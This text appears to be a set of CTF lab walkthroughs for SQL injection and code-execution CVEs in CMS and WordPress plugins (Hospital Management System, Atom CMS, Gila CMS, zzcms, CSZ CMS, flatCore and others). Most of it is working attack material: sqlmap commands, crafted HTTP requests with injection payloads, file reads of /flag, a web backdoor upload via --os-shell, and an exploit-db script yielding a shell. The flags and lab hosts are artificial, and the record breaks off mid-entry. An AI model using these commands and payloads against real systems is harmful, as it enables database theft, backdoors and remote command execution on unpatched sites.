└─$ sqlmap -r victor-sql.txt --dbms mysql --technique=T --thread 1 --time-sec 2 --file-read /flag
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:21:59 /2023-06-12/
[10:21:59] [INFO] parsing HTTP request from 'victor-sql.txt'
[10:21:59] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:21:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_name=123' AND (SELECT 5189 FROM (SELECT(SLEEP(2)))DLQA) AND 'hNLb'='hNLb&user_password=123&login=
---
[10:21:59] [INFO] testing MySQL
[10:21:59] [INFO] confirming MySQL
[10:21:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[10:21:59] [INFO] fingerprinting the back-end DBMS operating system
[10:22:03] [INFO] the back-end DBMS operating system is Linux
[10:22:03] [INFO] fetching file: '/flag'
[10:22:03] [INFO] retrieved:
[10:22:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
666C61677B37616636613933302D333731332D343833622D396230662D6132353430366238343864667D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[10:35:42] [INFO] retrieved:
[10:35:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
42
[10:35:55] [INFO] the local file '/home/kali/.local/share/sqlmap/output/eci-2ze7fshs6k2i8j96pyqi.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/eci-2ze7fshs6k2i8j96pyqi.cloudeci1.ichunqiu.com/files/_flag (same file)
[10:35:55] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze7fshs6k2i8j96pyqi.cloudeci1.ichunqiu.com'
[*] ending @ 10:35:55 /2023-06-12/
0x02 Put 666C61677B37616636613933302D333731332D343833622D396230662D6132353430366238343864667D into a hex editor to decode it
CVE-2022-24263
Target description:
Hospital Management System SQLi
0x01 Capture the login request and run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r hms-sql.txt --dbms mysql -p username1 --technique=B -theard 10 -D ctf -T flag --dump
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:52:59 /2023-06-12/
[10:52:59] [INFO] parsing HTTP request from 'hms-sql.txt'
[10:52:59] [INFO] setting file for logging HTTP traffic
[10:52:59] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jd7438qd5b0...5eatb2cqfg'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username1 (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username1=admina' OR NOT 9558=9558#&password2=admin&adsub=Login
---
[10:53:01] [INFO] testing MySQL
[10:53:01] [INFO] confirming MySQL
[10:53:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.20
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[10:53:01] [INFO] fetching columns for table 'flag' in database 'ctf'
[10:53:01] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:53:01] [INFO] retrieved:
got a 302 redirect to 'http://eci-2ze7pvgkweq2v9ejuqus.cloudeci1.ichunqiu.com:80/admin-panel1.php'. Do you want to follow? [Y/n] n
1
[10:53:03] [INFO] retrieved: flag
[10:53:06] [INFO] fetching entries for table 'flag' in database 'ctf'
[10:53:06] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[10:53:06] [INFO] retrieved: 1
[10:53:07] [INFO] retrieved: flag{034f23c4-de5c-45de-bf88-dd2c9baa9d9a}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{034f23c4-de5c-45de-bf88-dd2c9baa9d9a} |
+--------------------------------------------+
[10:53:38] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze7pvgkweq2v9ejuqus.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[10:53:38] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze7pvgkweq2v9ejuqus.cloudeci1.ichunqiu.com'
[*] ending @ 10:53:38 /2023-06-12/
CVE-2022-25488
Target description:
Atom CMS v2.0 has a SQL injection vulnerability in the /admin/ajax/avatar.php page
0x01 A quick Google search, then run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://eci-2ze7fshs6k2i9cunesl6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --technique=B --dbms mysql --os-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:06:41 /2023-06-12/
[11:06:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4326=4326
---
[11:06:41] [INFO] testing MySQL
[11:06:41] [INFO] confirming MySQL
[11:06:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:06:41] [INFO] going to use a web backdoor for command prompt
[11:06:41] [INFO] fingerprinting the back-end DBMS operating system
[11:06:41] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
[11:06:44] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[11:06:46] [WARNING] unable to automatically parse any web server path
[11:06:46] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[11:06:46] [WARNING] unable to upload the file stager on '/var/www/'
[11:06:46] [INFO] trying to upload the file stager on '/var/www/admin/ajax/' via LIMIT 'LINES TERMINATED BY' method
[11:06:47] [WARNING] unable to upload the file stager on '/var/www/admin/ajax/'
[11:06:47] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[11:06:47] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://eci-2ze7fshs6k2i9cunesl6.cloudeci1.ichunqiu.com:80/tmpusdwp.php
[11:06:47] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://eci-2ze7fshs6k2i9cunesl6.cloudeci1.ichunqiu.com:80/tmpbenko.php
[11:06:47] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> cat /flag
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'flag{34d205b4-f540-4307-b7d1-470af614e7a8}'
os-shell>
CVE-2021-24762
Target description:
WordPress Plugin Perfect Survey injection
0x01 Run sqlmap directly
$ sqlmap -u "http://eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20*%22%20" -D cms -T flag -C flag --dump --time-sec 2 --technique=T
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:34:06 /2023-06-12/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[02:34:07] [INFO] resuming back-end DBMS 'mysql'
[02:34:07] [INFO] testing connection to the target URL
[02:34:10] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
you have not declared cookie(s), while server wants to set its own ('wp-ps-session=rddjj93ndje...blvbonsq55'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php?action=get_question&question_id=1 AND (SELECT 3797 FROM (SELECT(SLEEP(2)))SQLk)-- fFLL"
---
[02:34:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:34:13] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'cms'
[02:34:13] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'cms'
[02:34:13] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[02:34:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[02:34:25] [WARNING] reflective value(s) found and filtering out of statistical model, please wait
.............................. (done)
flag{b2567224-88ca-4be2-a
[02:38:17] [ERROR] invalid character detected. retrying..
c79-30e9dc90232d}
Database: cms
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{b2567224-88ca-4be2-ac79-30e9dc90232d} |
+--------------------------------------------+
[02:40:43] [INFO] table 'cms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com/dump/cms/flag.csv'
[02:40:43] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 416 times
[02:40:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com'
[*] ending @ 02:40:43 /2023-06-12/
CVE-2022-23366
Target description:
Hospital Management Startup 1.0 sqli
0x01 Capture the request at the login page http://url/patientlogin.php and run sqlmap directly
┌──(kali㉿kali)-[~]
└─$ sqlmap -r hms-sql.txt --dbms mysql --time-sec 2 --technique=T -D ctf -T flag --dump
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:06:09 /2023-06-12/
[23:06:09] [INFO] parsing HTTP request from 'hms-sql.txt'
[23:06:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: loginid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: loginid=dsaf' AND (SELECT 3916 FROM (SELECT(SLEEP(2)))heZo) AND 'ETaW'='ETaW&password=safd&submit=Login
---
[23:06:15] [INFO] testing MySQL
[23:06:15] [INFO] confirming MySQL
[23:06:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.20
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[23:06:15] [INFO] fetching columns for table 'flag' in database 'ctf'
[23:06:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[23:06:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[23:06:23] [INFO] retrieved: flag
[23:06:53] [INFO] fetching entries for table 'flag' in database 'ctf'
[23:06:53] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[23:06:53] [INFO] retrieved: 1
[23:06:57] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{ded9bf56-67a7-4110-956e-92a60c9eda4e}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{ded9bf56-67a7-4110-956e-92a60c9eda4e} |
+--------------------------------------------+
[23:12:52] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze3tqb83gvdso4qm9rj.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[23:12:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze3tqb83gvdso4qm9rj.cloudeci1.ichunqiu.com'
[*] ending @ 23:12:52 /2023-06-12/
CVE-2022-0788
Target description:
One of the REST routes of the WordPress plugin WP Fundraising Donation and Crowdfunding Platform < 1.5.0 uses a parameter in an SQL statement without filtering it, resulting in an SQL injection vulnerability.
0x01 Run sqlmap directly
sqlmap -u http://eci-2zeh5tiqqmbja36mgght.cloudeci1.ichunqiu.com/index.php?rest_route=/xs-donate-form/payment-redirect/3 -v 3 --dbms mysql --method=Get --data '{"id":"(*","formid":"1","type":"online_payment"}' --test-filter="MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)" --time-sec 2 -D ctf -T flag --dump
CVE-2020-5515
Target description:
Gila CMS 1.11.8 has SQL injection in /admin/sql?query=
0x01 First log in with admin@admin.com / admin
0x02 Capture the request and run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ cat gils-cms-sql.txt
GET /admin/sql?query=3 HTTP/1.1
Host: eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=tnv9hgmhq64jmfrpkea6ktrkn8; GSESSIONID=1s9mvmd4hxo847ain0n40xp074iwwcup7g2g9uvr8um39ucz1v
Upgrade-Insecure-Requests: 1
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r gils-cms-sql.txt --dbms mysql --file-read /flag
[*] starting @ 10:25:11 /2023-06-13/
[10:25:11] [INFO] parsing HTTP request from 'gils-cms-sql.txt'
[10:25:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
Type: inline query
Title: Generic inline queries
Payload: query=(SELECT CONCAT(CONCAT(0x71627a7171,(CASE WHEN (6770=6770) THEN 0x31 ELSE 0x30 END)),0x716b787671))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: query=(SELECT 4216 FROM (SELECT(SLEEP(5)))GiUI)
---
[10:25:11] [INFO] testing MySQL
[10:25:11] [INFO] confirming MySQL
[10:25:11] [WARNING] reflective value(s) found and filtering out
[10:25:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[10:25:11] [INFO] fingerprinting the back-end DBMS operating system
[10:25:12] [INFO] the back-end DBMS operating system is Linux
[10:25:12] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[10:25:14] [INFO] retrieved: '42'
[10:25:14] [INFO] the local file '/home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com/files/_flag (same file)
[10:25:14] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com'
[*] ending @ 10:25:14 /2023-06-13/
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com/files/_flag
flag{8e9404fc-7b11-4240-8724-22b76b0816b2}
CVE-2020-19961
Target description:
zzcms 2019 has an SQL injection vulnerability in subzs.php
The correct answer should be: https://blog.csdn.net/weixin_36325615/article/details/115512796
0x01 Capture the request and run sqlmap directly
POST /admin/badip_add.php?action=add HTTP/1.1
Host: eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/admin/badip_add.php
Cookie: admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; tablename=zzcms_zsclass
Upgrade-Insecure-Requests: 1
ip=1.1.1.1&dose=&Submit=%E6%8F%90%E4%BA%A4
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r zzcms-sql1.txt --tech T --dbms mysql --time-sec 2 --file-read /flag
[*] starting @ 11:41:43 /2023-06-13/
[11:41:43] [INFO] parsing HTTP request from 'zzcms-sql1.txt'
[11:41:44] [WARNING] provided value for parameter 'dose' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:41:44] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'showbad.php'. Do you want to apply it from now on? [Y/n] n
[11:41:45] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ip (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: ip=1.1.1.1' RLIKE SLEEP(2) AND 'Aczf'='Aczf&dose=&Submit=%E6%8F%90%E4%BA%A4
---
[11:41:45] [INFO] testing MySQL
[11:41:45] [INFO] confirming MySQL
[11:41:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:41:45] [INFO] fingerprinting the back-end DBMS operating system
[11:41:45] [INFO] the back-end DBMS operating system is Linux
[11:41:45] [INFO] fetching file: '/flag'
[11:41:45] [INFO] resuming partial value: 666C
[11:41:45] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:41:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
61677B31303733356563332D643032392D346162382D386236642D3266643139343639643565617D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[11:48:10] [INFO] retrieved: 42
[11:48:18] [INFO] the local file '/home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/files/_flag (same file)
[11:48:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com'
[*] ending @ 11:48:18 /2023-06-13/
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/files/_flag
flag{10735ec3-d029-4ab8-8b6d-2fd19469d5ea}
CVE-2019-13275
Target description:
The v1/hit endpoint of the WordPress VeronaLabs wp-statistics plugin before version 12.6.7 has an SQL injection vulnerability.
0x01 Run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://eci-2ze2rdxwpdox7i6lo3in.cloudeci1.ichunqiu.com/wp-json/wpstatistics/v1/hit --data 'wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=*' --dbms mysql --level 5 --risk 3 --tech T --time-sec 2 -D ctf -T flag --dump
[*] starting @ 09:23:41 /2023-06-14/
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[09:23:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=' AND (SELECT 4306 FROM (SELECT(SLEEP(2)))erdg)-- QvZa
---
[09:23:43] [INFO] testing MySQL
[09:23:43] [INFO] confirming MySQL
[09:23:43] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[09:23:43] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:23:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[09:23:49] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[09:23:52] [INFO] retrieved: flag
[09:24:23] [INFO] fetching entries for table 'flag' in database 'ctf'
[09:24:23] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[09:24:23] [INFO] retrieved: 1
[09:24:26] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{daec2592-5eed-4b8e-ade4-9a875aec5761}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{daec2592-5eed-4b8e-ade4-9a875aec5761} |
+--------------------------------------------+
[09:30:25] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze2rdxwpdox7i6lo3in.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[09:30:25] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze2rdxwpdox7i6lo3in.cloudeci1.ichunqiu.com'
[*] ending @ 09:30:25 /2023-06-14/
CVE-2019-13086
Target description:
CSZ CMS is an open-source PHP content management system (CMS). In CSZ CMS 1.2.2 (before 2019-06-20) the file core/MY_Security.php has an SQL injection vulnerability. The flaw stems from the database-backed application failing to validate externally supplied input used in SQL statements; an attacker can exploit it to run unauthorized SQL commands.
https://github.com/cskaza/cszcms/issues/19
0x01 Following the payload posted by the GitHub issue author, craft the request, then build your own payload
POST request:
POST /member/login/check HTTP/1.1
Host: eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com
User-agent: '-(if((length((select name from user_admin limit 1))=10),*,1))-'', '127.0.0.1','time') #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-language: en-US,en;q=0.5
Accept-encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Origin: http://eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com
Referer: http://eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com/member/login/check
Cookie: cszcookie_13ce2195719b0c1a0c3415bd2b6ab2ffcsrf_cookie_csz=878d5c0937e2416e640bb5df6b728f7e; eci-2zeef04blsrc0lh3gu9e_cloudeci1_ichunqiu_com_cszsess=nmlp7hqumacupvm4nsphbn6vf9o8fln4
Upgrade-Insecure-Requests: 1
Content-Length: 34
Connection: close

email=111@111.com&password=111
Run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r csz1.2.2_sql.txt --tech T --dbms mysql --time-sec 2 --test-filter 'MySQL (MyPayload) SLEEP[5]' -D cms -T flag --dump
[*] starting @ 10:50:03 /2023-06-14/
[10:50:03] [INFO] parsing HTTP request from 'csz1.2.2_sql.txt'
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
Cookie parameter 'cszcookie_13ce2195719b0c1a0c3415bd2b6ab2ffcsrf_cookie_csz' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[10:50:07] [INFO] testing connection to the target URL
[10:50:08] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-agent #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL (MyPayload) SLEEP[5]
Payload: '-(if((length((select name from user_admin limit 1))=10), SLEEP(2),1))-'', '127.0.0.1','time') #
---
[10:50:08] [INFO] testing MySQL
[10:50:08] [INFO] confirming MySQL
[10:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:50:08] [INFO] fetching columns for table 'flag' in database 'cms'
[10:50:08] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[10:50:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
2
[10:50:16] [INFO] retrieved: id
[10:50:30] [INFO] retrieved: flag
[10:50:58] [INFO] fetching entries for table 'flag' in database 'cms'
[10:50:58] [INFO] fetching number of entries for table 'flag' in database 'cms'
[10:50:58] [INFO] retrieved: 1
[10:51:01] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{a031e81f-576a-49ea-9042-1e58afc2a442}
[10:57:00] [INFO] retrieved: 1
Database: cms
Table: flag
[1 entry]
+----+--------------------------------------------+
| id | flag |
+----+--------------------------------------------+
| 1 | flag{a031e81f-576a-49ea-9042-1e58afc2a442} |
+----+--------------------------------------------+
[10:57:05] [INFO] table 'cms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com/dump/cms/flag.csv'
[10:57:05] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 492 times
[10:57:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com'
[*] ending @ 10:57:05 /2023-06-14/
CVE-2021-41402
Target description:
flatCore-CMS v2.0.8 has an authenticated arbitrary code execution vulnerability in the back end
https://www.exploit-db.com/exploits/50262
0x01 Download the exploit and run it directly
┌──(kali㉿kali)-[~/Desktop]
└─$ python flatcore.py http://eci-2ze44g3v7edfrx4kqrf6.cloudeci1.ichunqiu.com admin 12345678
Logged in
$ whoami
www-data
$ cat /flag
flag{1d70adcd-1cc2-4025-ac82-369addbaa0f9}
$
CVE-2022-0410
Target description:
The WordPress plugin WP Visitor Statistics (Real Time Traffic) before 5.6 has an SQL injection vulnerability, because the refUrlDetails AJAX action does not sanitise or escape the id parameter. Login account: user01/user01
0x01 Log in first and capture the request
0x02 Run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r wp-sql.txt --dbms mysql --test-filter='MySQL MyPayload (SLEEP)' --tech T --time-sec 2 -D ctf -T flag --dump
[*] starting @ 23:45:43 /2023-06-16/
[23:45:43] [INFO] parsing HTTP request from 'wp-sql.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[23:48:32] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:48:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL MyPayload (SLEEP)
Payload: http://eci-2ze6p6jlhlj373ih0kge.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php?action=refUrlDetails&id= SLEEP(2)
---
[23:48:32] [INFO] testing MySQL
[23:48:32] [INFO] confirming MySQL
[23:48:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[23:48:32] [INFO] fetching columns for table 'flag' in database 'ctf'
[23:48:32] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[23:48:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[23:48:43] [INFO] retrieved: flag
[23:49:37] [INFO] fetching entries for table 'flag' in database 'ctf'
[23:49:37] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[23:49:37] [INFO] retrieved: 1
[23:49:42] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{a5eb6e6e-243e-4f2a-bf81-d057c9630bdd}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{a5eb6e6e-243e-4f2a-bf81-d057c9630bdd} |
+--------------------------------------------+
[00:01:19] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze6p6jlhlj373ih0kge.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[00:01:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze6p6jlhlj373ih0kge.cloudeci1.ichunqiu.com'
[*] ending @ 00:01:19 /2023-06-17/
CVE-2022-0784
Target description:
The WordPress plugin Title Experiments Free < 9.0.1 does not sanitise or escape user input, leading to SQL injection.
https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
0x01 Run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u 'http://eci-2zeiglmgxyblh0ok38vs.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php' --data 'action=wpex_titles&id[]=1*' --dbms mysql --tech T --test-filter 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --time-sec 2 -D ctf -T flag --dump
[*] starting @ 03:10:01 /2023-06-17/
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[03:10:03] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=b18b3e2845c...130df81049'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
